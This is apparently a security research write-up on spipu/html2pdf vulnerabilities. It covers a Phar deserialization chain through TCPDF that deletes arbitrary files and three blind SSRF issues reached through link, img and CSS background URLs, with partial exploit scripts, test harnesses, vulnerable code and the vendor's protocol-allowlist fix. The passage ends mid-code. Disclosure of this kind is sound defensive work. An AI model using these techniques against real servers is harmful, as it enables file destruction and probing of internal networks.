When describing this vulnerability, we mentioned a Phar archive. Attackers generate it on their machine with the POP chain we discovered. When using the spipu/html2pdf library, the TCPDF class of the tecnickcom/tcpdf library is in scope.

On the attacker’s machine, the `generate_phar.php` script was created and run. In it, we define the TCPDF class and create a TCPDF instance with preset values for two required fields: `file_id` and `imagekeys`.

Script for generating a Phar archive in tecnickcom/tcpdf using the POP chain we discovered

```
…
$dummy->file_id = -1;
$dummy->imagekeys = ["/tmp/../tmp/do_not_delete_this_file.txt"];

@unlink("archive.phar");
$archive = new Phar("archive.phar");
$archive->startBuffering();
$archive->setStub("…
…
$archive->setMetadata($dummy);
$archive->stopBuffering();
?>
```

We generate `archive.phar` using PHP 7.3 and rename it to `archive.png`. It is also important to set `phar.readonly=0` to allow successful generation.

Running the Phar archive generation script

```
user@machine:~$ php7.3 --define phar.readonly=0 generate_phar.php && mv archive.phar archive.png
```

The generated archive is placed on the target server. This can happen in various ways, for example via a file or image upload feature. In this case, we simply placed the Phar archive on the server at `/tmp/user_files/user_1/archive.png`.

Let’s also look at the contents of the generated Phar archive with the xxd binary utility, which creates a hexadecimal representation of the file.

Let’s demonstrate the web application source code.

The `$payload` variable contains a payload with the custom tag “cert” and its `src` and `privkey` attributes. Attackers control the values of these attributes, so they use the `phar://` protocol to reference the file `/tmp/user_files/user_1/archive.png` previously uploaded to the server. We assume that the payload provided from an external source is already in the `$payload` variable.

Web application source code

```
<?php
require __DIR__ . '/vendor/autoload.php';

use Spipu\Html2Pdf\Html2Pdf;

$payload = <<<payload
payload;

$html2pdf = new Html2Pdf('P', 'A4', 'en');
$html2pdf->writeHTML($payload);
echo $html2pdf->output('example01.pdf');
?>
```

When we access the web application script, processing the payload calls the Html2Pdf `_tag_open_CERT` method, which in turn calls the native function `file_exists` with the value `phar:///tmp/user_files/user_1/archive.png`. This triggers deserialization of the TCPDF class in the archive, followed by its destruction via the `__destruct` magic method. As we recall, this results in the deletion of an arbitrary file from the system, provided that the current process has permissions.

The request returns a successfully generated PDF file.

Let’s check the target system for the file `/tmp/do_not_delete_this_file.txt`. The file was successfully deleted, which indicates successful exploitation of the vulnerability.

##### Fix

The unsafe Phar deserialization was addressed by the vendor on February 26, 2025 in a new library version, 5.3.1.

A new Security class with the `checkValidPath` function was added to the library. The function’s logic matches the protocol requested in the string against a whitelist of allowed protocols, such as file, http, and https. If an external attacker attempts to use a protocol that is not allowed, for example phar, `checkValidPath` throws an `HtmlParsingException`.

Adding the Security class and the checkValidPath method to validate the protocol

```
class Security implements SecurityInterface
{
    protected $authorizedSchemes = ['file', 'http', 'https'];

    /**
     * @param string $path
     * @return void
     * @throws HtmlParsingException
     */
    public function checkValidPath(string $path): void
    {
        $path = trim(strtolower($path));
        $scheme = parse_url($path, PHP_URL_SCHEME);

        if ($scheme === null) {
            return;
        }

        if (in_array($scheme, $this->authorizedSchemes)) {
            return;
        }

        if (strlen($scheme) === 1 && preg_match('/^[a-z]$/i', $scheme)) {
            return;
        }

        throw new HtmlParsingException('Unauthorized path scheme');
    }
}
```
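A short usage sketch may help to see which inputs such an allowlist accepts. The helper below, `isSchemeAllowed`, is a hypothetical standalone function that only mirrors the scheme comparison shown above. It is not part of html2pdf, it omits the single-letter (drive letter) branch, and, as an assumption of this sketch, it rejects values that `parse_url` cannot parse.

```php
<?php
// Hypothetical helper mirroring the allowlist idea; not html2pdf code.
function isSchemeAllowed(string $path): bool
{
    $allowed = ['file', 'http', 'https'];
    $scheme = parse_url(trim(strtolower($path)), PHP_URL_SCHEME);

    if ($scheme === null) {
        // No scheme at all, for example a plain local path.
        return true;
    }
    if ($scheme === false) {
        // parse_url() could not parse the value; treat it as rejected.
        return false;
    }

    return in_array($scheme, $allowed, true);
}

$samples = [
    '/tmp/user_files/user_1/private_image.png',
    'https://example.com/logo.png',
    'phar://archive.phar/image.png',
    'http://127.0.0.1:8080/style.css',
];

foreach ($samples as $sample) {
    printf("%-45s %s\n", $sample, isSchemeAllowed($sample) ? 'allowed' : 'rejected');
}
```

Only the `phar` sample is rejected. The last sample passes: a scheme allowlist blocks wrappers such as `phar`, but by itself it does not restrict which hosts an `http` URL may point to.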

#### Vulnerability 2. Server-Side Request Forgery (Blind SSRF) via the link tag and href attribute

_Researcher: Aleksey Solovev_

##### Description

Next we demonstrate a series of three server-side request forgery vulnerabilities, each with its own characteristics.

The first vulnerability is triggered by attempting to load CSS (Cascading Style Sheets).

We will demonstrate the exploitation of this vulnerability on version 5.3.0 of the spipu/html2pdf library.

Installing the vulnerable version of the spipu/html2pdf library

“`
$ composer require spipu/html2pdf:5.3.0
“`

##### Technical details

The `extractStyle` method of the `Css` class parses HTML markup that may be controlled by attackers. Following the regex-based parsing ( _markers 1_ and _2_), the method extracts the tag attributes ( _marker 3_) and checks them for the expected values ( _marker 4_).

Next, the `$url` variable is initialized ( _marker 5_) and then passed to the native function `file_get_contents` ( _marker 6_). This results in a server-side request execution.

Function for extracting cascading style sheets

```
class Css
{
    …
    public function extractStyle($html)
    {
        // the CSS content
        $style = ' ';

        // extract the link tags, and remove them in the html code
        preg_match_all('/<link([^>]*)>/isU', $html, $match); // marker 1
        $html = preg_replace('/<link[^>]*>/isU', '', $html);
        $html = preg_replace('/<\/link[^>]*>/isU', '', $html);
        …
        // analyse each link tag
        foreach ($match[1] as $code) { // marker 2
            $tmp = $this->tagParser->extractTagAttributes($code); // marker 3

            // if type text/css => we keep it
            if (isset($tmp['type']) && strtolower($tmp['type']) === 'text/css' && isset($tmp['href'])) { // marker 4
                // get the href
                $url = $tmp['href']; // marker 5

                // get the content of the css file
                $this->checkValidPath($url);
                $content = @file_get_contents($url); // marker 6
                …
            }
        }
        …
    }
    …
}
```
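The flow described above can be sketched outside the library. The function below, `collectStylesheetUrls`, is a hypothetical simplification: it uses the same kind of regex-based `link` matching, replaces the library's tag parser with a basic attribute regex (double-quoted attributes only), and returns the URLs instead of fetching them. The sample URL path is illustrative.

```php
<?php
// Hypothetical simplification of the link-tag handling; it only
// collects the URLs that would be passed on to file_get_contents().
function collectStylesheetUrls(string $html): array
{
    $urls = [];
    preg_match_all('/<link([^>]*)>/isU', $html, $tags);

    foreach ($tags[1] as $code) {
        // Simplified attribute parsing: name="value" pairs only.
        preg_match_all('/([a-z-]+)\s*=\s*"([^"]*)"/i', $code, $pairs, PREG_SET_ORDER);
        $attributes = [];
        foreach ($pairs as $pair) {
            $attributes[strtolower($pair[1])] = $pair[2];
        }

        if (isset($attributes['type'], $attributes['href'])
            && strtolower($attributes['type']) === 'text/css'
        ) {
            $urls[] = $attributes['href'];
        }
    }

    return $urls;
}

$html = '<p>Invoice</p><link type="text/css" href="http://127.0.0.1:8080/style.css">';
print_r(collectStylesheetUrls($html));
```

Any markup that reaches the renderer with such a `link` tag yields a URL chosen entirely by whoever supplied the markup.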

##### Exploitation

To demonstrate exploitation of this vulnerability, the web application below passes html2pdf a `link` tag whose `type` attribute is set to `text/css` and whose `href` attribute points to the target server's local address on port 8080.

Web application source code

```
<?php
require __DIR__ . '/vendor/autoload.php';

use Spipu\Html2Pdf\Html2Pdf;

$content = '';

$html2pdf = new Html2Pdf();
$html2pdf->writeHTML($content);
$html2pdf->output();
?>
```

Note that an arbitrary web application is running on the target server on port 8080. A request arriving at this application shows that the attacker can reach an internal address and port of the server.

Starting the web application on port 8080 on the target server

```
user@machine:~$ mkdir app && python3 -m http.server 8080 -d ./app
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) …
```

The attacker accesses the web application script that generates the PDF file. The web application running on the same server on port 8080 receives a single loopback request with local address 127.0.0.1 when attempting to obtain the cascading style sheets.

##### Fix

A description of the fix will follow shortly.
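Independently of the vendor's fix, the calling application can refuse obviously internal targets before handing markup to the renderer. The sketch below is an illustration under stated assumptions, not html2pdf code: `isInternalIpUrl` is a hypothetical helper that only recognizes URLs whose host is an IP literal, using PHP's `filter_var` with `FILTER_FLAG_NO_PRIV_RANGE` and `FILTER_FLAG_NO_RES_RANGE`. Hostnames that resolve to internal addresses, redirects, and DNS rebinding are outside its scope.

```php
<?php
// Hypothetical pre-filter: true when the URL host is an IP literal
// from a private or reserved range (loopback included).
function isInternalIpUrl(string $url): bool
{
    $host = parse_url($url, PHP_URL_HOST);
    if (!is_string($host)) {
        return false; // no host component, nothing to classify
    }
    $host = trim($host, '[]'); // strip brackets around IPv6 literals

    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        return false; // a hostname; this sketch does not resolve DNS
    }

    $public = filter_var(
        $host,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    );

    return $public === false;
}

var_dump(isInternalIpUrl('http://127.0.0.1:8080/style.css'));
var_dump(isInternalIpUrl('http://10.0.0.5/logo.png'));
var_dump(isInternalIpUrl('https://example.com/logo.png'));
```

A `false` result only means that the helper did not classify the target as internal; it is not a guarantee that the URL is safe to fetch.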

#### Vulnerability 3. Server-Side Request Forgery (Blind SSRF) via the img tag and the src attribute

_Researcher: Aleksey Solovev_

##### Description

Here we examine the classic case—executing a server-side request via an image.

We will demonstrate the exploitation of this vulnerability on version 5.3.0 of the spipu/html2pdf library.

Installing the vulnerable version of the spipu/html2pdf library

“`
$ composer require spipu/html2pdf:5.3.0
“`

##### Technical details

In the `Html2Pdf` class, the `_drawImage` method takes the attacker-controlled `$src` variable as its first argument.

Execution can then reach two different code paths where the native `getimagesize` function is called ( _marker 1_ and _marker 2_). To determine the size of the specified image, `getimagesize` has to request data from the resource, which can lead to the execution of a server-side request.

The `Html2Pdf::_drawImage` method

```
class Html2Pdf
{
    …
    protected function _drawImage($src, $subLi = false)
    {
        …
        if (strpos($src, 'data:') === 0) {
            $src = base64_decode(
                preg_replace('#^data:image/[^;]+;base64,#', '', $src)
            );
            $infos = @getimagesizefromstring($src);
            $src = "@{$src}";
        } else {
            $this->parsingCss->checkValidPath($src);
            $infos = @getimagesize($src); // marker 1
        }
        …
        // if the image does not exist, or can not be loaded
        if (!is_array($infos) || count($infos)<2) {
            …
            // if we have a fallback Image, we use it
            if ($this->_fallbackImage) {
                $src = $this->_fallbackImage;
                $infos = @getimagesize($src); // marker 2
                …
            }
        }
        …
    }
    …
}
```

##### Exploitation

To demonstrate exploitation of this vulnerability, the web application below passes html2pdf an `img` tag whose `src` attribute points to the target server's local address on port 8080.

Web application source code

```
<?php
require __DIR__ . '/vendor/autoload.php';

use Spipu\Html2Pdf\Html2Pdf;

$content = "";

$html2pdf = new Html2Pdf('P', 'A4', 'fr');
$html2pdf->writeHTML($content);
echo $html2pdf->output('example01.pdf');
?>
```

Note that an arbitrary web application is running on the target server on port 8080. A request arriving at this application shows that the attacker can reach an internal address and port of the server.

Starting the web application on port 8080 on the target server

```
user@machine:~$ mkdir app && python3 -m http.server 8080 -d ./app
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) …
```

The attacker accesses the web application script that generates the PDF file. The web application running on the same server on port 8080 will receive one loopback request at the local address 127.0.0.1 when attempting to obtain the size of the requested image.

When we requested the script, we received a 500 Internal Server Error. Nevertheless, the server-side request was executed.

##### Fix

Please be a little patient. When describing the next vulnerability, we will demonstrate the fix—and what happened after we analyzed the patch proposed by the vendor!

#### Vulnerability 4. Server-Side Request Forgery (Blind SSRF) via the CSS background property and the url function

_Researcher: Aleksey Solovev_

##### Description

The native `getimagesize` function is called again, which will lead to a server-side request execution, but under different circumstances.

Installing the vulnerable version of the spipu/html2pdf library

“`
$ composer require spipu/html2pdf:5.3.0
“`

##### Technical details

When the `Html2Pdf::_drawRectangle` method is called, the `$iName` variable is initialized from `$background['image']` ( _marker 1_). Next, `$iName` is passed to the native `getimagesize` function ( _marker 2_), which can lead to the execution of a server-side request.

The Html2Pdf _drawRectangle method

```
class Html2Pdf
{
    …
    protected function _drawRectangle($x, $y, $w, $h, $border, $padding, $margin, $background)
    {
        …
        // prepare the background image
        if ($background['image']) {
            $iName = $background['image']; // marker 1
            …
            // get the size of the image
            // WARNING : if URL, "allow_url_fopen" must turned to "on" in php.ini
            $imageInfos=@getimagesize($iName); // marker 2
            …
        }
        …
    }
    …
}
```

##### Exploitation

To exploit this vulnerability, we will demonstrate the source code of the web application that contains the `div` tag with the `style` attribute. In the CSS, the `background` property will be set using the `url()` function. This function takes a value that contains the local address of the target server on port 8080.
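How attacker-supplied CSS ends up as an argument to `getimagesize` can be sketched in isolation. The function below, `extractBackgroundUrls`, is a hypothetical simplification and not the library's CSS parser: it pulls every `url(...)` value out of a `style` attribute string, which corresponds to the value later used as the background image name. The sample URL path is illustrative.

```php
<?php
// Hypothetical simplification; html2pdf uses its own CSS parser.
function extractBackgroundUrls(string $style): array
{
    // Matches url(value), url('value') and url("value").
    preg_match_all('/url\(\s*["\']?([^"\')\s]+)["\']?\s*\)/i', $style, $matches);

    return $matches[1];
}

$style = 'background: url(http://127.0.0.1:8080/bg.png) no-repeat';
print_r(extractBackgroundUrls($style));
```

The extracted value is taken from the markup as-is, so whoever controls the `style` attribute also controls the address that the image-size lookup contacts.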

Web application source code

“`
<?php
require __DIR__ . '/vendor/autoload.php';

use Spipu\Html2Pdf\Html2Pdf;

$content = '

Hello World
